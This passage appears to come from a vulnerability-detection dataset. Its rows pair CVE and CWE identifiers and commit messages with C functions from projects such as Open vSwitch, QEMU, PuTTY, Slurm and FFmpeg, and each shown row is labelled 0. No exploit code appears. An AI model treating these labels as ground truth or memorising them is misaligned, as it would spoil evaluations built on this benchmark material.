cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=2 actions=NORMAL
cookie=0x0, duration=2.465s, table=1, n_packets=0, n_bytes=0, priority=0,in_port=3 actions=NORMAL
$ cat flow-modify.txt
flow modify table=1,priority=0,in_port=2,actions=drop
flow modify table=1,priority=0,in_port=3,actions=group:10
$ ovs-ofctl bundle br-test flow-modify.txt -OOpenflow13
First flow rule will be modified since it is a valid rule. However second
rule is invalid since no group with id 10 exists. Bundle commit tries to
revert (insert) the first rule to old flow which results in ovs_assert at
ofproto_rule_insert__() since old rule->state = RULE_REMOVED.
Signed-off-by: Vishal Deep Ajmera <vishal.deep.ajmera@ericsson.com>
Signed-off-by: Ben Pfaff <blp@ovn.org>
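The essence of the assertion change, reduced to a toy rule structure; the enum and function below are illustrative, not the OVS definitions.
#include <assert.h>

enum rule_state { RULE_INITIALIZED, RULE_INSERTED, RULE_REMOVED };

struct toy_rule { enum rule_state state; };

static void toy_rule_insert(struct toy_rule *r)
{
    /* The old check was effectively assert(r->state == RULE_INITIALIZED),
     * which only holds for brand-new rules; an old rule being restored
     * during a bundle revert is in RULE_REMOVED and trips the assert.
     * The relaxed check below rejects only rules that are already inserted,
     * so both new and previously removed rules can be (re)inserted. */
    assert(r->state != RULE_INSERTED);
    r->state = RULE_INSERTED;
}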
|
replace_rule_revert(struct ofproto *ofproto,
struct rule *old_rule, struct rule *new_rule)
{
struct oftable *table = &ofproto->tables[new_rule->table_id];
if (old_rule) {
if (old_rule->removed_reason == OFPRR_EVICTION) {
/* Revert the eviction. */
eviction_group_add_rule(old_rule);
}
/* Restore the old rule to data structures. */
ofproto_rule_insert__(ofproto, old_rule);
/* Restore the original visibility of the old rule. */
cls_rule_restore_visibility(&old_rule->cr);
} else {
/* Restore table's rule count. */
table->n_flows--;
}
/* Remove the new rule immediately. It was never visible to lookups. */
if (!classifier_remove(&table->cls, &new_rule->cr)) {
OVS_NOT_REACHED();
}
ofproto_rule_remove__(ofproto, new_rule);
ofproto_rule_unref(new_rule);
}
|
replace_rule_revert(struct ofproto *ofproto,
struct rule *old_rule, struct rule *new_rule)
{
struct oftable *table = &ofproto->tables[new_rule->table_id];
if (old_rule) {
if (old_rule->removed_reason == OFPRR_EVICTION) {
/* Revert the eviction. */
eviction_group_add_rule(old_rule);
}
/* Restore the old rule to data structures. */
ofproto_rule_insert__(ofproto, old_rule);
/* Restore the original visibility of the old rule. */
cls_rule_restore_visibility(&old_rule->cr);
} else {
/* Restore table's rule count. */
table->n_flows--;
}
/* Remove the new rule immediately. It was never visible to lookups. */
if (!classifier_remove(&table->cls, &new_rule->cr)) {
OVS_NOT_REACHED();
}
ofproto_rule_remove__(ofproto, new_rule);
ofproto_rule_unref(new_rule);
}
|
C
|
ovs
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/aa0e1ed74972a619072341b6409dc5cacd2418aa
|
aa0e1ed74972a619072341b6409dc5cacd2418aa
|
[BlackBerry] willComposite() and didComposite() are now in InspectorController
https://bugs.webkit.org/show_bug.cgi?id=110343
Patch by Alberto Garcia <albgarcia@rim.com> on 2013-02-21
Reviewed by Carlos Garcia Campos.
This was changed in r142879.
* Api/WebPage.cpp:
(BlackBerry::WebKit::WebPagePrivate::willComposite):
(BlackBerry::WebKit::WebPagePrivate::didComposite):
git-svn-id: svn://svn.chromium.org/blink/trunk@143584 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
void WebPagePrivate::enterFullScreenForElement(Element* element)
{
#if ENABLE(VIDEO)
if (!element)
return;
if (m_webSettings->fullScreenVideoCapable() && element->hasTagName(HTMLNames::videoTag)) {
enterFullscreenForNode(element);
} else {
if (transformedActualVisibleSize() != transformedViewportSize()) {
m_scaleBeforeFullScreen = currentScale();
m_scrollPositionBeforeFullScreen = m_mainFrame->view()->scrollPosition();
m_orientationBeforeFullScreen = orientation();
}
client()->fullscreenStart();
m_fullscreenNode = element;
}
#endif
}
|
void WebPagePrivate::enterFullScreenForElement(Element* element)
{
#if ENABLE(VIDEO)
if (!element)
return;
if (m_webSettings->fullScreenVideoCapable() && element->hasTagName(HTMLNames::videoTag)) {
enterFullscreenForNode(element);
} else {
if (transformedActualVisibleSize() != transformedViewportSize()) {
m_scaleBeforeFullScreen = currentScale();
m_scrollPositionBeforeFullScreen = m_mainFrame->view()->scrollPosition();
m_orientationBeforeFullScreen = orientation();
}
client()->fullscreenStart();
m_fullscreenNode = element;
}
#endif
}
|
C
|
Chrome
| 0 |
CVE-2017-6542
|
https://www.cvedetails.com/cve/CVE-2017-6542/
|
CWE-119
|
https://git.tartarus.org/?p=simon/putty.git;a=commitdiff;h=4ff22863d895cb7ebfced4cf923a012a614adaa8
|
4ff22863d895cb7ebfced4cf923a012a614adaa8
| null |
static void logeventf(Ssh ssh, const char *fmt, ...)
{
va_list ap;
char *buf;
va_start(ap, fmt);
buf = dupvprintf(fmt, ap);
va_end(ap);
logevent(buf);
sfree(buf);
}
|
static void logeventf(Ssh ssh, const char *fmt, ...)
{
va_list ap;
char *buf;
va_start(ap, fmt);
buf = dupvprintf(fmt, ap);
va_end(ap);
logevent(buf);
sfree(buf);
}
|
C
|
tartarus
| 0 |
CVE-2016-5126
|
https://www.cvedetails.com/cve/CVE-2016-5126/
|
CWE-119
|
https://git.qemu.org/?p=qemu.git;a=commit;h=a6b3167fa0e825aebb5a7cd8b437b6d41584a196
|
a6b3167fa0e825aebb5a7cd8b437b6d41584a196
| null |
static void iscsi_close(BlockDriverState *bs)
{
IscsiLun *iscsilun = bs->opaque;
struct iscsi_context *iscsi = iscsilun->iscsi;
iscsi_detach_aio_context(bs);
if (iscsi_is_logged_in(iscsi)) {
iscsi_logout_sync(iscsi);
}
iscsi_destroy_context(iscsi);
g_free(iscsilun->zeroblock);
g_free(iscsilun->allocationmap);
memset(iscsilun, 0, sizeof(IscsiLun));
}
|
static void iscsi_close(BlockDriverState *bs)
{
IscsiLun *iscsilun = bs->opaque;
struct iscsi_context *iscsi = iscsilun->iscsi;
iscsi_detach_aio_context(bs);
if (iscsi_is_logged_in(iscsi)) {
iscsi_logout_sync(iscsi);
}
iscsi_destroy_context(iscsi);
g_free(iscsilun->zeroblock);
g_free(iscsilun->allocationmap);
memset(iscsilun, 0, sizeof(IscsiLun));
}
|
C
|
qemu
| 0 |
CVE-2016-2476
|
https://www.cvedetails.com/cve/CVE-2016-2476/
|
CWE-119
|
https://android.googlesource.com/platform/frameworks/av/+/295c883fe3105b19bcd0f9e07d54c6b589fc5bff
|
295c883fe3105b19bcd0f9e07d54c6b589fc5bff
|
DO NOT MERGE Verify OMX buffer sizes prior to access
Bug: 27207275
Change-Id: I4412825d1ee233d993af0a67708bea54304ff62d
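The general pattern behind "verify buffer sizes prior to access" can be sketched as checking the supplied length before interpreting a caller-provided blob as a structure; the names here are hypothetical, not the OMX code.
#include <stddef.h>
#include <string.h>

struct param_blob {
    unsigned int size;    /* caller-supplied size of the whole blob */
    unsigned int value;
};

/* Reject undersized buffers before treating them as a param structure. */
static int read_param(const void *buf, size_t buf_len, unsigned int *out)
{
    struct param_blob blob;

    if (buf == NULL || buf_len < sizeof(blob))
        return -1;                 /* the missing bounds check */
    memcpy(&blob, buf, sizeof(blob));
    if (blob.size < sizeof(blob))
        return -1;
    *out = blob.value;
    return 0;
}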
|
void SimpleSoftOMXComponent::onPortEnable(OMX_U32 portIndex, bool enable) {
CHECK_LT(portIndex, mPorts.size());
PortInfo *port = &mPorts.editItemAt(portIndex);
CHECK_EQ((int)port->mTransition, (int)PortInfo::NONE);
CHECK(port->mDef.bEnabled == !enable);
if (!enable) {
port->mDef.bEnabled = OMX_FALSE;
port->mTransition = PortInfo::DISABLING;
for (size_t i = 0; i < port->mBuffers.size(); ++i) {
BufferInfo *buffer = &port->mBuffers.editItemAt(i);
if (buffer->mOwnedByUs) {
buffer->mOwnedByUs = false;
if (port->mDef.eDir == OMX_DirInput) {
notifyEmptyBufferDone(buffer->mHeader);
} else {
CHECK_EQ(port->mDef.eDir, OMX_DirOutput);
notifyFillBufferDone(buffer->mHeader);
}
}
}
port->mQueue.clear();
} else {
port->mTransition = PortInfo::ENABLING;
}
checkTransitions();
}
|
void SimpleSoftOMXComponent::onPortEnable(OMX_U32 portIndex, bool enable) {
CHECK_LT(portIndex, mPorts.size());
PortInfo *port = &mPorts.editItemAt(portIndex);
CHECK_EQ((int)port->mTransition, (int)PortInfo::NONE);
CHECK(port->mDef.bEnabled == !enable);
if (!enable) {
port->mDef.bEnabled = OMX_FALSE;
port->mTransition = PortInfo::DISABLING;
for (size_t i = 0; i < port->mBuffers.size(); ++i) {
BufferInfo *buffer = &port->mBuffers.editItemAt(i);
if (buffer->mOwnedByUs) {
buffer->mOwnedByUs = false;
if (port->mDef.eDir == OMX_DirInput) {
notifyEmptyBufferDone(buffer->mHeader);
} else {
CHECK_EQ(port->mDef.eDir, OMX_DirOutput);
notifyFillBufferDone(buffer->mHeader);
}
}
}
port->mQueue.clear();
} else {
port->mTransition = PortInfo::ENABLING;
}
checkTransitions();
}
|
C
|
Android
| 0 |
CVE-2012-5112
|
https://www.cvedetails.com/cve/CVE-2012-5112/
|
CWE-399
|
https://github.com/chromium/chromium/commit/d65b01ca819881a507b5e60c25a2f9caff58cd57
|
d65b01ca819881a507b5e60c25a2f9caff58cd57
|
Wipe out QuotaThreadTask.
This is one of a series of refactoring patches for QuotaManager.
http://codereview.chromium.org/10872054/
http://codereview.chromium.org/10917060/
BUG=139270
Review URL: https://chromiumcodereview.appspot.com/10919070
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@154987 0039d316-1c4b-4281-b951-d872f2087c98
|
QuotaManager::~QuotaManager() {
proxy_->manager_ = NULL;
std::for_each(clients_.begin(), clients_.end(),
std::mem_fun(&QuotaClient::OnQuotaManagerDestroyed));
if (database_.get())
db_thread_->DeleteSoon(FROM_HERE, database_.release());
}
|
QuotaManager::~QuotaManager() {
proxy_->manager_ = NULL;
std::for_each(clients_.begin(), clients_.end(),
std::mem_fun(&QuotaClient::OnQuotaManagerDestroyed));
if (database_.get())
db_thread_->DeleteSoon(FROM_HERE, database_.release());
}
|
C
|
Chrome
| 0 |
CVE-2016-10030
|
https://www.cvedetails.com/cve/CVE-2016-10030/
|
CWE-284
|
https://github.com/SchedMD/slurm/commit/92362a92fffe60187df61f99ab11c249d44120ee
|
92362a92fffe60187df61f99ab11c249d44120ee
|
Fix security issue in _prolog_error().
Fix security issue caused by insecure file path handling triggered by
the failure of a Prolog script. To exploit this a user needs to
anticipate or cause the Prolog to fail for their job.
(This commit is slightly different from the fix to the 15.08 branch.)
CVE-2016-10030.
|
_send_slurmstepd_init(int fd, int type, void *req,
slurm_addr_t *cli, slurm_addr_t *self,
hostset_t step_hset, uint16_t protocol_version)
{
int len = 0;
Buf buffer = NULL;
slurm_msg_t msg;
uid_t uid = (uid_t)-1;
gid_t gid = (uid_t)-1;
gids_t *gids = NULL;
int rank, proto;
int parent_rank, children, depth, max_depth;
char *parent_alias = NULL;
char *user_name = NULL;
slurm_addr_t parent_addr = {0};
char pwd_buffer[PW_BUF_SIZE];
struct passwd pwd, *pwd_result;
slurm_msg_t_init(&msg);
/* send type over to slurmstepd */
safe_write(fd, &type, sizeof(int));
/* step_hset can be NULL for batch scripts OR if the job was submitted
* by SlurmUser or root using the --no-allocate/-Z option and the job
* job credential validation by _check_job_credential() failed. If the
* job credential did not validate, then it did not come from slurmctld
* and there is no reason to send step completion messages to slurmctld.
*/
if (step_hset == NULL) {
bool send_error = false;
if (type == LAUNCH_TASKS) {
launch_tasks_request_msg_t *launch_req;
launch_req = (launch_tasks_request_msg_t *) req;
if (launch_req->job_step_id != SLURM_EXTERN_CONT)
send_error = true;
}
if (send_error) {
info("task rank unavailable due to invalid job "
"credential, step completion RPC impossible");
}
rank = -1;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else if ((type == LAUNCH_TASKS) &&
(((launch_tasks_request_msg_t *)req)->alias_list)) {
/* In the cloud, each task talks directly to the slurmctld
* since node addressing is abnormal */
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else {
#ifndef HAVE_FRONT_END
int count;
count = hostset_count(step_hset);
rank = hostset_find(step_hset, conf->node_name);
reverse_tree_info(rank, count, REVERSE_TREE_WIDTH,
&parent_rank, &children,
&depth, &max_depth);
if (rank > 0) { /* rank 0 talks directly to the slurmctld */
int rc;
/* Find the slurm_addr_t of this node's parent slurmd
* in the step host list */
parent_alias = hostset_nth(step_hset, parent_rank);
rc = slurm_conf_get_addr(parent_alias, &parent_addr);
if (rc != SLURM_SUCCESS) {
error("Failed looking up address for "
"NodeName %s", parent_alias);
/* parent_rank = -1; */
}
}
#else
/* In FRONT_END mode, one slurmd pretends to be all
* NodeNames, so we can't compare conf->node_name
* to the NodeNames in step_hset. Just send step complete
* RPC directly to the controller.
*/
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
#endif
}
debug3("slurmstepd rank %d (%s), parent rank %d (%s), "
"children %d, depth %d, max_depth %d",
rank, conf->node_name,
parent_rank, parent_alias ? parent_alias : "NONE",
children, depth, max_depth);
if (parent_alias)
free(parent_alias);
/* send reverse-tree info to the slurmstepd */
safe_write(fd, &rank, sizeof(int));
safe_write(fd, &parent_rank, sizeof(int));
safe_write(fd, &children, sizeof(int));
safe_write(fd, &depth, sizeof(int));
safe_write(fd, &max_depth, sizeof(int));
safe_write(fd, &parent_addr, sizeof(slurm_addr_t));
/* send conf over to slurmstepd */
if (_send_slurmd_conf_lite(fd, conf) < 0)
goto rwfail;
/* send cli address over to slurmstepd */
buffer = init_buf(0);
slurm_pack_slurm_addr(cli, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
/* send self address over to slurmstepd */
if (self) {
buffer = init_buf(0);
slurm_pack_slurm_addr(self, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
/* Send GRES information to slurmstepd */
gres_plugin_send_stepd(fd);
/* send cpu_frequency info to slurmstepd */
cpu_freq_send_info(fd);
/* send req over to slurmstepd */
switch(type) {
case LAUNCH_BATCH_JOB:
gid = (uid_t)((batch_job_launch_msg_t *)req)->gid;
uid = (uid_t)((batch_job_launch_msg_t *)req)->uid;
user_name = ((batch_job_launch_msg_t *)req)->user_name;
msg.msg_type = REQUEST_BATCH_JOB_LAUNCH;
break;
case LAUNCH_TASKS:
/*
* The validity of req->uid was verified against the
* auth credential in _rpc_launch_tasks(). req->gid
* has NOT yet been checked!
*/
gid = (uid_t)((launch_tasks_request_msg_t *)req)->gid;
uid = (uid_t)((launch_tasks_request_msg_t *)req)->uid;
user_name = ((launch_tasks_request_msg_t *)req)->user_name;
msg.msg_type = REQUEST_LAUNCH_TASKS;
break;
default:
error("Was sent a task I didn't understand");
break;
}
buffer = init_buf(0);
msg.data = req;
if (protocol_version == (uint16_t)NO_VAL)
proto = SLURM_PROTOCOL_VERSION;
else
proto = protocol_version;
msg.protocol_version = (uint16_t)proto;
pack_msg(&msg, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &proto, sizeof(int));
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
#ifdef HAVE_NATIVE_CRAY
/* Try to avoid calling this on a system which is a native
* cray. getpwuid_r is slow on the compute nodes and this has
* in theory been verified earlier.
*/
if (!user_name) {
#endif
/* send cached group ids array for the relevant uid */
debug3("_send_slurmstepd_init: call to getpwuid_r");
if (slurm_getpwuid_r(uid, &pwd, pwd_buffer, PW_BUF_SIZE,
&pwd_result) || (pwd_result == NULL)) {
error("%s: getpwuid_r: %m", __func__);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
debug3("%s: return from getpwuid_r", __func__);
if (gid != pwd_result->pw_gid) {
debug("%s: Changing gid from %d to %d",
__func__, gid, pwd_result->pw_gid);
}
gid = pwd_result->pw_gid;
if (!user_name)
user_name = pwd_result->pw_name;
#ifdef HAVE_NATIVE_CRAY
}
#endif
if (!user_name) {
/* Sanity check since gids_cache_lookup will fail
* with a NULL. */
error("%s: No user name for %d: %m", __func__, uid);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
if ((gids = _gids_cache_lookup(user_name, gid))) {
int i;
uint32_t tmp32;
safe_write(fd, &gids->ngids, sizeof(int));
for (i = 0; i < gids->ngids; i++) {
tmp32 = (uint32_t)gids->gids[i];
safe_write(fd, &tmp32, sizeof(uint32_t));
}
_dealloc_gids(gids);
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
return 0;
rwfail:
if (buffer)
free_buf(buffer);
error("_send_slurmstepd_init failed");
return errno;
}
|
_send_slurmstepd_init(int fd, int type, void *req,
slurm_addr_t *cli, slurm_addr_t *self,
hostset_t step_hset, uint16_t protocol_version)
{
int len = 0;
Buf buffer = NULL;
slurm_msg_t msg;
uid_t uid = (uid_t)-1;
gid_t gid = (uid_t)-1;
gids_t *gids = NULL;
int rank, proto;
int parent_rank, children, depth, max_depth;
char *parent_alias = NULL;
char *user_name = NULL;
slurm_addr_t parent_addr = {0};
char pwd_buffer[PW_BUF_SIZE];
struct passwd pwd, *pwd_result;
slurm_msg_t_init(&msg);
/* send type over to slurmstepd */
safe_write(fd, &type, sizeof(int));
/* step_hset can be NULL for batch scripts OR if the job was submitted
* by SlurmUser or root using the --no-allocate/-Z option and the job
* job credential validation by _check_job_credential() failed. If the
* job credential did not validate, then it did not come from slurmctld
* and there is no reason to send step completion messages to slurmctld.
*/
if (step_hset == NULL) {
bool send_error = false;
if (type == LAUNCH_TASKS) {
launch_tasks_request_msg_t *launch_req;
launch_req = (launch_tasks_request_msg_t *) req;
if (launch_req->job_step_id != SLURM_EXTERN_CONT)
send_error = true;
}
if (send_error) {
info("task rank unavailable due to invalid job "
"credential, step completion RPC impossible");
}
rank = -1;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else if ((type == LAUNCH_TASKS) &&
(((launch_tasks_request_msg_t *)req)->alias_list)) {
/* In the cloud, each task talks directly to the slurmctld
* since node addressing is abnormal */
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
} else {
#ifndef HAVE_FRONT_END
int count;
count = hostset_count(step_hset);
rank = hostset_find(step_hset, conf->node_name);
reverse_tree_info(rank, count, REVERSE_TREE_WIDTH,
&parent_rank, &children,
&depth, &max_depth);
if (rank > 0) { /* rank 0 talks directly to the slurmctld */
int rc;
/* Find the slurm_addr_t of this node's parent slurmd
* in the step host list */
parent_alias = hostset_nth(step_hset, parent_rank);
rc = slurm_conf_get_addr(parent_alias, &parent_addr);
if (rc != SLURM_SUCCESS) {
error("Failed looking up address for "
"NodeName %s", parent_alias);
/* parent_rank = -1; */
}
}
#else
/* In FRONT_END mode, one slurmd pretends to be all
* NodeNames, so we can't compare conf->node_name
* to the NodeNames in step_hset. Just send step complete
* RPC directly to the controller.
*/
rank = 0;
parent_rank = -1;
children = 0;
depth = 0;
max_depth = 0;
#endif
}
debug3("slurmstepd rank %d (%s), parent rank %d (%s), "
"children %d, depth %d, max_depth %d",
rank, conf->node_name,
parent_rank, parent_alias ? parent_alias : "NONE",
children, depth, max_depth);
if (parent_alias)
free(parent_alias);
/* send reverse-tree info to the slurmstepd */
safe_write(fd, &rank, sizeof(int));
safe_write(fd, &parent_rank, sizeof(int));
safe_write(fd, &children, sizeof(int));
safe_write(fd, &depth, sizeof(int));
safe_write(fd, &max_depth, sizeof(int));
safe_write(fd, &parent_addr, sizeof(slurm_addr_t));
/* send conf over to slurmstepd */
if (_send_slurmd_conf_lite(fd, conf) < 0)
goto rwfail;
/* send cli address over to slurmstepd */
buffer = init_buf(0);
slurm_pack_slurm_addr(cli, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
/* send self address over to slurmstepd */
if (self) {
buffer = init_buf(0);
slurm_pack_slurm_addr(self, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
/* Send GRES information to slurmstepd */
gres_plugin_send_stepd(fd);
/* send cpu_frequency info to slurmstepd */
cpu_freq_send_info(fd);
/* send req over to slurmstepd */
switch(type) {
case LAUNCH_BATCH_JOB:
gid = (uid_t)((batch_job_launch_msg_t *)req)->gid;
uid = (uid_t)((batch_job_launch_msg_t *)req)->uid;
user_name = ((batch_job_launch_msg_t *)req)->user_name;
msg.msg_type = REQUEST_BATCH_JOB_LAUNCH;
break;
case LAUNCH_TASKS:
/*
* The validity of req->uid was verified against the
* auth credential in _rpc_launch_tasks(). req->gid
* has NOT yet been checked!
*/
gid = (uid_t)((launch_tasks_request_msg_t *)req)->gid;
uid = (uid_t)((launch_tasks_request_msg_t *)req)->uid;
user_name = ((launch_tasks_request_msg_t *)req)->user_name;
msg.msg_type = REQUEST_LAUNCH_TASKS;
break;
default:
error("Was sent a task I didn't understand");
break;
}
buffer = init_buf(0);
msg.data = req;
if (protocol_version == (uint16_t)NO_VAL)
proto = SLURM_PROTOCOL_VERSION;
else
proto = protocol_version;
msg.protocol_version = (uint16_t)proto;
pack_msg(&msg, buffer);
len = get_buf_offset(buffer);
safe_write(fd, &proto, sizeof(int));
safe_write(fd, &len, sizeof(int));
safe_write(fd, get_buf_data(buffer), len);
free_buf(buffer);
buffer = NULL;
#ifdef HAVE_NATIVE_CRAY
/* Try to avoid calling this on a system which is a native
* cray. getpwuid_r is slow on the compute nodes and this has
* in theory been verified earlier.
*/
if (!user_name) {
#endif
/* send cached group ids array for the relevant uid */
debug3("_send_slurmstepd_init: call to getpwuid_r");
if (slurm_getpwuid_r(uid, &pwd, pwd_buffer, PW_BUF_SIZE,
&pwd_result) || (pwd_result == NULL)) {
error("%s: getpwuid_r: %m", __func__);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
debug3("%s: return from getpwuid_r", __func__);
if (gid != pwd_result->pw_gid) {
debug("%s: Changing gid from %d to %d",
__func__, gid, pwd_result->pw_gid);
}
gid = pwd_result->pw_gid;
if (!user_name)
user_name = pwd_result->pw_name;
#ifdef HAVE_NATIVE_CRAY
}
#endif
if (!user_name) {
/* Sanity check since gids_cache_lookup will fail
* with a NULL. */
error("%s: No user name for %d: %m", __func__, uid);
len = 0;
safe_write(fd, &len, sizeof(int));
errno = ESLURMD_UID_NOT_FOUND;
return errno;
}
if ((gids = _gids_cache_lookup(user_name, gid))) {
int i;
uint32_t tmp32;
safe_write(fd, &gids->ngids, sizeof(int));
for (i = 0; i < gids->ngids; i++) {
tmp32 = (uint32_t)gids->gids[i];
safe_write(fd, &tmp32, sizeof(uint32_t));
}
_dealloc_gids(gids);
} else {
len = 0;
safe_write(fd, &len, sizeof(int));
}
return 0;
rwfail:
if (buffer)
free_buf(buffer);
error("_send_slurmstepd_init failed");
return errno;
}
|
C
|
slurm
| 0 |
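Editor's note on the entry above: in _send_slurmstepd_init(), every variable-sized field crosses the slurmd-to-slurmstepd channel as a length prefix followed by the payload, written with safe_write() and unwound through the rwfail label on error. A minimal sketch of that framing pattern is below, assuming ordinary POSIX write(2) semantics; the helpers are illustrative and are not Slurm's actual safe_write:

#include <errno.h>
#include <stdint.h>
#include <unistd.h>

/* Write exactly len bytes, retrying on short writes and EINTR. */
static int write_all(int fd, const void *buf, size_t len)
{
    const char *p = buf;
    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Length-prefixed framing over a local pipe (same byte order on both
 * ends): the receiver reads the fixed-width length, then exactly that
 * many payload bytes. */
static int send_frame(int fd, const void *payload, uint32_t len)
{
    if (write_all(fd, &len, sizeof(len)) < 0)
        return -1;
    return write_all(fd, payload, len);
}

int main(void)
{
    const char msg[] = "hello step daemon";
    return send_frame(STDOUT_FILENO, msg, (uint32_t)sizeof(msg)) == 0 ? 0 : 1;
}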
CVE-2018-14395
|
https://www.cvedetails.com/cve/CVE-2018-14395/
|
CWE-369
|
https://github.com/FFmpeg/FFmpeg/commit/fa19fbcf712a6a6cc5a5cfdc3254a97b9bce6582
|
fa19fbcf712a6a6cc5a5cfdc3254a97b9bce6582
|
avformat/movenc: Write version 2 of audio atom if channels is not known
The version 1 needs the channel count and would divide by 0
Fixes: division by 0
Fixes: fpe_movenc.c_1108_1.ogg
Fixes: fpe_movenc.c_1108_2.ogg
Fixes: fpe_movenc.c_1108_3.wav
Found-by: #CHEN HONGXU# <HCHEN017@e.ntu.edu.sg>
Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
|
static int mov_write_ctts_tag(AVFormatContext *s, AVIOContext *pb, MOVTrack *track)
{
MOVMuxContext *mov = s->priv_data;
MOVStts *ctts_entries;
uint32_t entries = 0;
uint32_t atom_size;
int i;
ctts_entries = av_malloc_array((track->entry + 1), sizeof(*ctts_entries)); /* worst case */
if (!ctts_entries)
return AVERROR(ENOMEM);
ctts_entries[0].count = 1;
ctts_entries[0].duration = track->cluster[0].cts;
for (i = 1; i < track->entry; i++) {
if (track->cluster[i].cts == ctts_entries[entries].duration) {
ctts_entries[entries].count++; /* compress */
} else {
entries++;
ctts_entries[entries].duration = track->cluster[i].cts;
ctts_entries[entries].count = 1;
}
}
entries++; /* last one */
atom_size = 16 + (entries * 8);
avio_wb32(pb, atom_size); /* size */
ffio_wfourcc(pb, "ctts");
if (mov->flags & FF_MOV_FLAG_NEGATIVE_CTS_OFFSETS)
avio_w8(pb, 1); /* version */
else
avio_w8(pb, 0); /* version */
avio_wb24(pb, 0); /* flags */
avio_wb32(pb, entries); /* entry count */
for (i = 0; i < entries; i++) {
avio_wb32(pb, ctts_entries[i].count);
avio_wb32(pb, ctts_entries[i].duration);
}
av_free(ctts_entries);
return atom_size;
}
|
static int mov_write_ctts_tag(AVFormatContext *s, AVIOContext *pb, MOVTrack *track)
{
MOVMuxContext *mov = s->priv_data;
MOVStts *ctts_entries;
uint32_t entries = 0;
uint32_t atom_size;
int i;
ctts_entries = av_malloc_array((track->entry + 1), sizeof(*ctts_entries)); /* worst case */
if (!ctts_entries)
return AVERROR(ENOMEM);
ctts_entries[0].count = 1;
ctts_entries[0].duration = track->cluster[0].cts;
for (i = 1; i < track->entry; i++) {
if (track->cluster[i].cts == ctts_entries[entries].duration) {
ctts_entries[entries].count++; /* compress */
} else {
entries++;
ctts_entries[entries].duration = track->cluster[i].cts;
ctts_entries[entries].count = 1;
}
}
entries++; /* last one */
atom_size = 16 + (entries * 8);
avio_wb32(pb, atom_size); /* size */
ffio_wfourcc(pb, "ctts");
if (mov->flags & FF_MOV_FLAG_NEGATIVE_CTS_OFFSETS)
avio_w8(pb, 1); /* version */
else
avio_w8(pb, 0); /* version */
avio_wb24(pb, 0); /* flags */
avio_wb32(pb, entries); /* entry count */
for (i = 0; i < entries; i++) {
avio_wb32(pb, ctts_entries[i].count);
avio_wb32(pb, ctts_entries[i].duration);
}
av_free(ctts_entries);
return atom_size;
}
|
C
|
FFmpeg
| 0 |
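Editor's note on the entry above: the commit message describes the actual fix (emit the version 2 audio sample description when the channel count is unknown, because the version 1 layout divides by the channel count); the ctts writer shown in the row is neighbouring context from the same file rather than the fixed function. A hedged sketch of the guard pattern, with invented names:

#include <stdint.h>
#include <stdio.h>

/* Illustrative: in a "version 1"-style layout, bytes per frame is
 * bytes_per_packet / channels.  If channels can legitimately be 0
 * (unknown), the division is a crash, so signal the caller to pick a
 * layout that does not need it. */
static int bytes_per_frame(uint32_t bytes_per_packet, uint32_t channels)
{
    if (channels == 0)
        return -1;                  /* caller falls back to another version */
    return (int)(bytes_per_packet / channels);
}

int main(void)
{
    int v = bytes_per_frame(4096, 0);
    if (v < 0)
        puts("channel count unknown: write the version-2 atom instead");
    else
        printf("bytes per frame: %d\n", v);
    return 0;
}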
null | null | null |
https://github.com/chromium/chromium/commit/fb83de09f2c986ee91741f3a2776feea0e18e3f6
|
fb83de09f2c986ee91741f3a2776feea0e18e3f6
|
Revert "[Picture in Picture] Call parent function in OnGestureEvent."
This reverts commit e60d9aef9d1eeeff4e5954ba137ed5009261f626.
Reason for revert: Causes the close button to receive gesture events even when it's not the target of the tap. This causes the PiP window to unexpectedly close.
Bug: 895773
Original change's description:
> [Picture in Picture] Call parent function in OnGestureEvent.
>
> Change-Id: I854654be22abd217c3f8ed557bc3fb9118c557c6
> Reviewed-on: https://chromium-review.googlesource.com/1192326
> Reviewed-by: CJ DiMeglio <lethalantidote@chromium.org>
> Commit-Queue: apacible <apacible@chromium.org>
> Cr-Commit-Position: refs/heads/master@{#586820}
# Not skipping CQ checks because original CL landed > 1 day ago.
Change-Id: I2f36d78713f0b811a0a2681e09284c394e146a5c
Reviewed-on: https://chromium-review.googlesource.com/c/1318397
Commit-Queue: Tommy Steimel <steimel@chromium.org>
Reviewed-by: CJ DiMeglio <lethalantidote@chromium.org>
Reviewed-by: Mounir Lamouri <mlamouri@chromium.org>
Cr-Commit-Position: refs/heads/master@{#607039}
|
void OverlayWindowViews::SetUpViews() {
gfx::Rect larger_window_bounds = GetBounds();
larger_window_bounds.Inset(-1, -1);
